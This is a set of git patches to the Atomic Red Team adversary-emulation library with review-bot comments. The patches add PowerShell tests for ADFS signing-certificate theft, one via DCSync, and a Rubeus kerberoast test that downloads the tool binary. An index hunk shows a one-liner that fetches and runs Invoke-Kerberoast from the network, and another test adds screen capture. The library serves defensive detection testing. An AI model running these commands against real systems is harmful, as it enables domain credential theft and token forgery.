@@ -49,6 +49,8 @@ credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users, credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell credential-access,T1110.003,Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt +credential-access,T1552.004,Private Keys,6,ADFS token signing and encryption certificates theft - Local,78e95057-d429-4e66-8f82-0f060c1ac96f,powershell +credential-access,T1552.004,Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index df1ee3c0..a61424e2 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md 
@@ -114,6 +114,8 @@ - Atomic Test #3: Copy Private SSH Keys with CP [linux] - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux] - Atomic Test #5: Copy the users GnuPG directory with rsync [macos, linux] + - Atomic Test #6: ADFS token signing and encryption certificates theft - Local [windows] + - Atomic Test #7: ADFS token signing and encryption certificates theft - Remote [windows] - [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md) - Atomic Test #1: Dump individual process memory with sh (Local) [linux] - Atomic Test #2: Dump individual process memory with Python (Local) [linux] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 3b558504..61d8b1ed 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -85,6 +85,8 @@ - Atomic Test #3: Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows] - [T1552.004 Private Keys](../../T1552.004/T1552.004.md) - Atomic Test #1: Private Keys [windows] + - Atomic Test #6: ADFS token signing and encryption certificates theft - Local [windows] + - Atomic Test #7: ADFS token signing and encryption certificates theft - Remote [windows] - T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md) - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 280d6c9c..64ae0f2b 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -5129,6 +5129,99 @@ credential-access: ' name: sh + - name: ADFS token signing and encryption certificates theft - Local + auto_generated_guid: 78e95057-d429-4e66-8f82-0f060c1ac96f + description: | + Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as Administrator on an ADFS server. + Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump. + supported_platforms: + - windows + dependency_executor_name: powershell + dependencies: + - description: 'AADInternals module must be installed. + +' + prereq_command: 'if (Get-Module AADInternals) {exit 0} else {exit 1} + +' + get_prereq_command: 'Install-Module -Name AADInternals -Force + +' + executor: + command: | + Import-Module AADInternals -Force + Export-AADIntADFSCertificates + Get-ChildItem | Where-Object {$_ -like "ADFS*"} + Write-Host "`nCertificates retrieved successfully" + cleanup_command: | + Remove-Item -Path ".\ADFS_encryption.pfx" + Remove-Item -Path ".\ADFS_signing.pfx" + name: powershell + - name: ADFS token signing and encryption certificates theft - Remote + auto_generated_guid: cab413d8-9e4a-4b8d-9b84-c985bd73a442 + description: | + Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as a Domain Administrators user on a domain-joined computer. + Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump. + supported_platforms: + - windows + input_arguments: + adfs_service_account_name: + description: Name of the ADFS service account + type: String + default: adfs_svc + replication_user: + description: Username with replication rights. 
It can be the Domain Admin + running the script + type: String + default: Administrator + replication_password: + description: Password of replication_username + type: String + default: ReallyStrongPassword + adfs_server_name: + description: Name of an ADFS server + type: String + default: sts.contoso.com + dependency_executor_name: powershell + dependencies: + - description: 'AADInternals and ActiveDirectory modules must be installed. + +' + prereq_command: 'if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable + -Name ActiveDirectory)) {echo 0} else {echo 1} + +' + get_prereq_command: 'Install-Module -Name AADInternals -Force + +' + executor: + command: "Import-Module ActiveDirectory -Force \nImport-Module AADInternals + -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc + = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object + name -eq \"#{adfs_service_account_name}\"\n$PWord = ConvertTo-SecureString + -String \"#{replication_password}\" -AsPlainText -Force\n$Credential = New-Object + -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, + $PWord\n# use DCSync to fetch the ADFS service account's NT hash\n$hash + = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential + -Server $dcServerName -AsHex\n$ADFSConfig = Export-AADIntADFSConfiguration + -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}\n# Get + certificates decryption key\n$Configuration = [xml]$ADFSConfig\n$group = + $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group\n$container + = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName\n$parent + = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn\n$base + = \"LDAP://CN=$group,$container,$parent\"\n$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))\n$ADSearch.Filter + = 
'(name=CryptoPolicy)'\n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"displayName\") + | Out-Null\n$aduser = $ADSearch.FindOne()\n$keyObjectGuid = $ADUser.Properties[\"displayName\"] + \n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"thumbnailphoto\") + | Out-Null\n$ADSearch.Filter=\"(l=$keyObjectGuid)\"\n$aduser=$ADSearch.FindOne() + \n$key=[byte[]]$aduser.Properties[\"thumbnailphoto\"][0] \n# Get encrypted + certificates from configuration and decrypt them\nExport-AADIntADFSCertificates + -Configuration $ADFSConfig -Key $key\nGet-ChildItem | Where-Object {$_ -like + \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n" + cleanup_command: | + Remove-Item -Path ".\ADFS_encryption.pfx" + Remove-Item -Path ".\ADFS_signing.pfx" + name: powershell T1003.007: technique: external_references: diff --git a/atomics/T1552.004/T1552.004.md b/atomics/T1552.004/T1552.004.md index 4387c051..23998a59 100644 --- a/atomics/T1552.004/T1552.004.md +++ b/atomics/T1552.004/T1552.004.md @@ -20,6 +20,10 @@ Some private keys require a password or passphrase for operation, so an adversar - [Atomic Test #5 - Copy the users GnuPG directory with rsync](#atomic-test-5---copy-the-users-gnupg-directory-with-rsync) +- [Atomic Test #6 - ADFS token signing and encryption certificates theft - Local](#atomic-test-6---adfs-token-signing-and-encryption-certificates-theft---local) + +- [Atomic Test #7 - ADFS token signing and encryption certificates theft - Remote](#atomic-test-7---adfs-token-signing-and-encryption-certificates-theft---remote) +
@@ -204,4 +208,137 @@ rm -rf #{output_folder} +
+
+ +## Atomic Test #6 - ADFS token signing and encryption certificates theft - Local +Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as Administrator on an ADFS server. +Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 78e95057-d429-4e66-8f82-0f060c1ac96f + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Import-Module AADInternals -Force +Export-AADIntADFSCertificates +Get-ChildItem | Where-Object {$_ -like "ADFS*"} +Write-Host "`nCertificates retrieved successfully" +``` + +#### Cleanup Commands: +```powershell +Remove-Item -Path ".\ADFS_encryption.pfx" +Remove-Item -Path ".\ADFS_signing.pfx" +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: AADInternals module must be installed. +##### Check Prereq Commands: +```powershell +if (Get-Module AADInternals) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AADInternals -Force +``` + + + + +
+
+ +## Atomic Test #7 - ADFS token signing and encryption certificates theft - Remote +Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as a Domain Administrators user on a domain-joined computer. +Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** cab413d8-9e4a-4b8d-9b84-c985bd73a442 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| adfs_service_account_name | Name of the ADFS service account | String | adfs_svc| +| replication_user | Username with replication rights. It can be the Domain Admin running the script | String | Administrator| +| replication_password | Password of replication_username | String | ReallyStrongPassword| +| adfs_server_name | Name of an ADFS server | String | sts.contoso.com| + + +#### Attack Commands: Run with `powershell`! 
+ + +```powershell +Import-Module ActiveDirectory -Force +Import-Module AADInternals -Force | Out-Null +#Get Configuration +$dcServerName = (Get-ADDomainController).HostName +$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq "#{adfs_service_account_name}" +$PWord = ConvertTo-SecureString -String "#{replication_password}" -AsPlainText -Force +$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord +# use DCSync to fetch the ADFS service account's NT hash +$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex +$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name} +# Get certificates decryption key +$Configuration = [xml]$ADFSConfig +$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group +$container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName +$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn +$base = "LDAP://CN=$group,$container,$parent" +$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base)) +$ADSearch.Filter = '(name=CryptoPolicy)' +$ADSearch.PropertiesToLoad.Clear() +$ADSearch.PropertiesToLoad.Add("displayName") | Out-Null +$aduser = $ADSearch.FindOne() +$keyObjectGuid = $ADUser.Properties["displayName"] +$ADSearch.PropertiesToLoad.Clear() +$ADSearch.PropertiesToLoad.Add("thumbnailphoto") | Out-Null +$ADSearch.Filter="(l=$keyObjectGuid)" +$aduser=$ADSearch.FindOne() +$key=[byte[]]$aduser.Properties["thumbnailphoto"][0] +# Get encrypted certificates from configuration and decrypt them +Export-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key +Get-ChildItem | Where-Object {$_ -like "ADFS*"} +Write-Host "`nCertificates retrieved successfully" +``` + +#### Cleanup Commands: +```powershell 
+Remove-Item -Path ".\ADFS_encryption.pfx" +Remove-Item -Path ".\ADFS_signing.pfx" +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: AADInternals and ActiveDirectory modules must be installed. +##### Check Prereq Commands: +```powershell +if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable -Name ActiveDirectory)) {echo 0} else {echo 1} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AADInternals -Force +``` + + + +
From ad98393d8b44d02f422e76927901e8ea30b71c96 Mon Sep 17 00:00:00 2001 From: Brandon Morgan Date: Fri, 20 Aug 2021 15:17:49 -0500 Subject: [PATCH 32/39] rubeus-kerberoasting (#1609) Co-authored-by: Carrie Roberts --- atomics/T1558.003/T1558.003.yaml | 48 ++++++++++++++++++++++++++++++++ 1 file changed, 48 insertions(+) diff --git a/atomics/T1558.003/T1558.003.yaml b/atomics/T1558.003/T1558.003.yaml index 58abe080..597849a6 100644 --- a/atomics/T1558.003/T1558.003.yaml +++ b/atomics/T1558.003/T1558.003.yaml 
@@ -26,3 +26,51 @@ atomic_tests: Invoke-Kerberoast | fl name: powershell +- name: Rubeus kerberoast + description: | + Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast + This build targets .NET 4.5. If targeting a different version you will need to compile Rubeus + supported_platforms: + - windows + input_arguments: + local_folder: + description: Local path of Rubeus executable + type: Path + default: $Env:temp + local_executable: + description: name of the rubeus executable + type: String + default: 'rubeus.exe' + out_file: + description: file where command results are stored + type: String + default: rubeus_output.txt + rubeus_url: + description: URL of Rubeus executable + type: url + default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe + flags: + description: command flags you would like to run (optional and blank by default) + type: String + default: + dependency_executor_name: powershell + dependencies: + - description: | + Computer must be domain joined + prereq_command: | + if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} + get_prereq_command: | + Write-Host Joining this computer to a domain must be done manually + - description: | + Rubeus must exist + prereq_command: | + if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} + get_prereq_command: | + Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} + executor: + command: | + cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}" + cleanup_command: | + Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore + name: powershell + elevation_required: false \ No newline at end of file From 2b02f773326ddef8f406ddcaf0e59d341cef9d30 Mon Sep 17 00:00:00 2001 
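Review bot: The two prerequisite commands interpolate the executable path unquoted — `if(Test-Path -Path #{local_folder}\#{local_executable}) ...` and `Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}` — while the executor line quotes the same path, so a `local_folder` value containing a space is split into separate arguments in the check and the download but not in the run; quote both as `"#{local_folder}\#{local_executable}"`. The description's link anchor `#asreproast` points at a different Rubeus action than the kerberoast this test runs, and "it's creators" should read "its creators". The get_prereq_command fetches a prebuilt binary from a fork at a pinned commit but never verifies it; recording the expected archive hash (placeholder `<EXPECTED_SHA256>`) and comparing it with `Get-FileHash` after the download would make the prerequisite reproducible and surface a replaced artifact. The `atomic_tests` list this entry is appended to starts outside the hunk.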
From: CircleCI Atomic Red Team GUID generator Date: Fri, 20 Aug 2021 20:18:17 +0000 Subject: [PATCH 33/39] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1558.003/T1558.003.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1558.003/T1558.003.yaml b/atomics/T1558.003/T1558.003.yaml index 597849a6..e389ff38 100644 --- a/atomics/T1558.003/T1558.003.yaml +++ b/atomics/T1558.003/T1558.003.yaml @@ -27,6 +27,7 @@ atomic_tests: name: powershell - name: Rubeus kerberoast + auto_generated_guid: 14625569-6def-4497-99ac-8e7817105b55 description: | Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast This build targets .NET 4.5. If targeting a different version you will need to compile Rubeus diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index b3f3a3cb..8b43e97c 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -766,3 +766,4 @@ aa6cb8c4-b582-4f8e-b677-37733914abda 615bd568-2859-41b5-9aed-61f6a88e48dd 78e95057-d429-4e66-8f82-0f060c1ac96f cab413d8-9e4a-4b8d-9b84-c985bd73a442 +14625569-6def-4497-99ac-8e7817105b55 From 69aa9d859d20199b10e22e6b97f8296dfb23f9b3 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 20 Aug 2021 20:18:22 +0000 Subject: [PATCH 34/39] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 62 ++++++++++++++++++ atomics/T1558.003/T1558.003.md | 65 +++++++++++++++++++ 6 files changed, 131 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index fd3686a6..e97b9bff 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv 
+++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -28,6 +28,7 @@ credential-access,T1558.001,Golden Ticket,1,Crafting Active Directory golden tic credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell +credential-access,T1558.003,Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index c02a3d0f..dd925884 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -16,6 +16,7 @@ credential-access,T1558.001,Golden Ticket,1,Crafting Active Directory golden tic credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell +credential-access,T1558.003,Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index a61424e2..0b8ffec9 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -53,6 +53,7 @@ - T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1558.003 Kerberoasting](../../T1558.003/T1558.003.md) - Atomic Test #1: Request for service tickets [windows] + - Atomic Test #2: Rubeus kerberoast [windows] - [T1555.001 Keychain](../../T1555.001/T1555.001.md) - Atomic Test #1: Keychain [macos] - [T1056.001 Keylogging](../../T1056.001/T1056.001.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 61d8b1ed..b4e18773 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md 
@@ -37,6 +37,7 @@ - T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1558.003 Kerberoasting](../../T1558.003/T1558.003.md) - Atomic Test #1: Request for service tickets [windows] + - Atomic Test #2: Rubeus kerberoast [windows] - [T1056.001 Keylogging](../../T1056.001/T1056.001.md) - Atomic Test #1: Input Capture [windows] - T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 64ae0f2b..4e12228a 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -2420,6 +2420,68 @@ credential-access: iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing) Invoke-Kerberoast | fl name: powershell + - name: Rubeus kerberoast + auto_generated_guid: 14625569-6def-4497-99ac-8e7817105b55 + description: | + Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast + This build targets .NET 4.5. If targeting a different version you will need to compile Rubeus + supported_platforms: + - windows + input_arguments: + local_folder: + description: Local path of Rubeus executable + type: Path + default: "$Env:temp" + local_executable: + description: name of the rubeus executable + type: String + default: rubeus.exe + out_file: + description: file where command results are stored + type: String + default: rubeus_output.txt + rubeus_url: + description: URL of Rubeus executable + type: url + default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe + flags: + description: command flags you would like to run (optional and blank by + default) + type: String + default: + dependency_executor_name: powershell + dependencies: + - description: 'Computer must be domain joined + +' + prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) + {exit 0} else {exit 1} + +' + get_prereq_command: 'Write-Host Joining this computer to a domain must be + done manually + +' + - description: 'Rubeus must exist + +' + prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit + 0} else {exit 1} + +' + get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} + +' + executor: + command: 'cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} + /outfile:"#{local_folder}\#{out_file}" + +' + cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore 
+ +' + name: powershell + elevation_required: false T1555.001: technique: created: '2020-02-12T18:55:24.728Z' diff --git a/atomics/T1558.003/T1558.003.md b/atomics/T1558.003/T1558.003.md index a2b11589..e019ef1f 100644 --- a/atomics/T1558.003/T1558.003.md +++ b/atomics/T1558.003/T1558.003.md @@ -14,6 +14,8 @@ Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003) - [Atomic Test #1 - Request for service tickets](#atomic-test-1---request-for-service-tickets) +- [Atomic Test #2 - Rubeus kerberoast](#atomic-test-2---rubeus-kerberoast) +
@@ -61,4 +63,67 @@ Write-Host Joining this computer to a domain must be done manually +
+
+ +## Atomic Test #2 - Rubeus kerberoast +Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast +This build targets .NET 4.5. If targeting a different version you will need to compile Rubeus + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 14625569-6def-4497-99ac-8e7817105b55 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| local_folder | Local path of Rubeus executable | Path | $Env:temp| +| local_executable | name of the rubeus executable | String | rubeus.exe| +| out_file | file where command results are stored | String | rubeus_output.txt| +| rubeus_url | URL of Rubeus executable | url | https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe| +| flags | command flags you would like to run (optional and blank by default) | String | | + + +#### Attack Commands: Run with `powershell`! + + +```powershell +cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}" +``` + +#### Cleanup Commands: +```powershell +Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: Computer must be domain joined +##### Check Prereq Commands: +```powershell +if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Write-Host Joining this computer to a domain must be done manually +``` +##### Description: Rubeus must exist +##### Check Prereq Commands: +```powershell +if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} +``` + + + +
From 9da37dabc8e58680b3eb1f57da31488e8927f5e3 Mon Sep 17 00:00:00 2001 From: gregclermont <580609+gregclermont@users.noreply.github.com> Date: Mon, 23 Aug 2021 23:06:58 +0200 Subject: [PATCH 35/39] Add T1113 test for CopyFromScreen API (#1610) --- atomics/T1113/T1113.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) diff --git a/atomics/T1113/T1113.yaml b/atomics/T1113/T1113.yaml index 47c3a3db..9124542a 100644 --- a/atomics/T1113/T1113.yaml +++ b/atomics/T1113/T1113.yaml @@ -118,3 +118,26 @@ atomic_tests: cmd /c "timeout #{recording_time} > NULL && psr.exe /stop" cleanup_command: | rm #{output_file} -ErrorAction Ignore +- name: Windows Screen Capture (CopyFromScreen) + description: | + Take a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API. + + [Graphics.CopyFromScreen]: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen + supported_platforms: + - windows + input_arguments: + output_file: + description: Path where captured results will be placed + type: Path + default: $env:TEMP\T1113.png + executor: + command: | + Add-Type -AssemblyName System.Windows.Forms + $screen = [Windows.Forms.SystemInformation]::VirtualScreen + $bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height + $graphic = [Drawing.Graphics]::FromImage($bitmap) + $graphic.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bitmap.Size) + $bitmap.Save("#{output_file}") + cleanup_command: | + Remove-Item #{output_file} -ErrorAction Ignore + name: powershell From 049c18afadff8b4be83463b00cd08ee4ad8a0bf4 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Mon, 23 Aug 2021 21:07:15 +0000 Subject: [PATCH 36/39] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1113/T1113.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1113/T1113.yaml b/atomics/T1113/T1113.yaml index 9124542a..a5771922 100644 
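Review bot: The executor never releases the GDI+ objects it creates — `$graphic` and `$bitmap` are left to the garbage collector after `$bitmap.Save("#{output_file}")`, so their unmanaged handles stay alive until the PowerShell process exits or a collection happens; add `$graphic.Dispose()` and `$bitmap.Dispose()` after the Save call. `Bitmap.Save` resolves a relative path against the .NET process working directory rather than the PowerShell location, so a non-default relative `output_file` would presumably be written somewhere the `Remove-Item #{output_file}` cleanup does not look; passing the path through `$ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath("#{output_file}")` first would keep both sides consistent. The enclosing `atomic_tests` list starts outside the hunk.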
--- a/atomics/T1113/T1113.yaml +++ b/atomics/T1113/T1113.yaml @@ -119,6 +119,7 @@ atomic_tests: cleanup_command: | rm #{output_file} -ErrorAction Ignore - name: Windows Screen Capture (CopyFromScreen) + auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187 description: | Take a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 8b43e97c..44f1a720 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -767,3 +767,4 @@ aa6cb8c4-b582-4f8e-b677-37733914abda 78e95057-d429-4e66-8f82-0f060c1ac96f cab413d8-9e4a-4b8d-9b84-c985bd73a442 14625569-6def-4497-99ac-8e7817105b55 +e9313014-985a-48ef-80d9-cde604ffc187 From c2601f14ed273d13043f6002dfdb0cafc88004c9 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 23 Aug 2021 21:07:19 +0000 Subject: [PATCH 37/39] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 25 ++++++++++ atomics/T1113/T1113.md | 46 +++++++++++++++++++ 6 files changed, 75 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index e97b9bff..48fab1bd 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
